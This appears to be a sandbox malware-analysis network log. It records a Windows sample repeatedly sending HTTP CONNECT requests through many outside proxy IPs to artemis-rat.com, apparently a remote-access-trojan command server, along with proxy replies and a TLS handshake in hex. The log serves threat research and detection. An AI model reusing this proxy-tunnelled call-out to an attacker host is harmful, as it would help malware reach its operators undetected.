                                              Mar 11, 2024 08:37:21.796452045 CET718INHTTP/1.1 502 Bad Gateway
                                              Server: Tengine
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 571
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 74 34 6e 66 33 77 73 39 30 37 62 63 79 6e 6a 71 6e 77 77 38 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 33 2f 31 31 20 31 35 3a 33 37 3a 32 31 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://artemis-rat.com</td></tr><tr><td>Server:</td><td>izt4nf3ws907bcynjqnww8z</td></tr><tr><td>Date:</td><td>2024/03/11 15:37:21</td></tr></table><hr/>Powered by Tengine<hr><center>tengine</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              947192.168.2.4527911.180.51.19488007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.247742891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              948192.168.2.45285645.138.87.23810807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.250062943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              949192.168.2.453034162.159.250.145807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.254203081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.439814091 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              950192.168.2.453010162.240.22.184480267284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.254342079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.866377115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.554100037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.741385937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              951192.168.2.450662103.123.25.65807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.254728079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.366714954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.366524935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.366429090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.460359097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:57.460103035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:09.460308075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:33.460310936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              952192.168.2.453065104.20.179.187807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.256314039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.437323093 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              953192.168.2.453070104.25.244.70807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.256664991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.437724113 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              954192.168.2.45292245.120.178.19710807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.259916067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              955192.168.2.45295618.169.83.8710807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.275832891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.574893951 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              956192.168.2.45290495.66.138.2188807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.275908947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              957192.168.2.45298638.162.25.5731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.276114941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.698542118 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              958192.168.2.45293894.130.94.45807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.276309013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              959192.168.2.453084104.21.31.189807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.276659966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.441924095 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              960192.168.2.45264051.68.164.77328247284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.276948929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.367616892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.054330111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.569708109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              961192.168.2.453089172.67.105.234807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.277023077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.442534924 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              962192.168.2.4529503.127.62.252807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.277049065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.581872940 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0
                                              Mar 11, 2024 08:37:21.608762980 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee b4 b0 05 3f 34 16 66 f3 fc a3 ab c0 19 cf df 63 30 e5 fa d3 65 cb 44 87 ed 55 4e 84 6b 99 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: lhe?4fc0eDUNk*,+0/$#('=<5/artemis-rat.com#!)[T<0'n)-F)R@Gf>Q9R:7PZ+bn
                                              Mar 11, 2024 08:37:21.915216923 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 e0 63 b4 52 8b 5e 9e e2 75 96 60 8f b0 38 38 16 7e 6b 25 cf fd 5d fd 89 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                              Data Ascii: =9cR^u`88~k%]DOWNGRD0000*H010Uartemis-rat.com0240311071028Z260311071028Z010Uartemis-rat.com0"0*H0=L!\z
                                              Mar 11, 2024 08:37:21.933281898 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 f0 95 a2 b1 8e df 9e eb f2 02 1d 25 5a b7 7f 68 42 b4 69 0c b2 70 03 98 ac 35 02 4f 0d aa ec 46 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 ac 6c 2e f5 97 8b 1e 30 6c d4 e4 44 b4 18 e0 54 ed 72 f3 c5 a2
                                              Data Ascii: %! %ZhBip5OF(l.0lDTr({J
                                              Mar 11, 2024 08:37:22.236505985 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 69 ea 17 25 91 7a a9 51 92 e6 b5 c3 bf 8e fa 8e 54 1a 6f f9 51 29 17 52 5f 61 dc 70 13 35 35 b4 61 5f e2 d1 27 0d 89 cf
                                              Data Ascii: (i%zQToQ)R_ap55a_'


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              963192.168.2.452967217.23.11.194471527284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.277257919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.576404095 CET226INHTTP/1.1 403 Forbidden
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Length: 101
                                              Content-Type: text/plain; charset=utf-8
                                              Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                              Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              964192.168.2.453100172.67.182.60807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.277533054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.442300081 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              965192.168.2.452971147.75.34.85807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.277844906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.580389023 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3
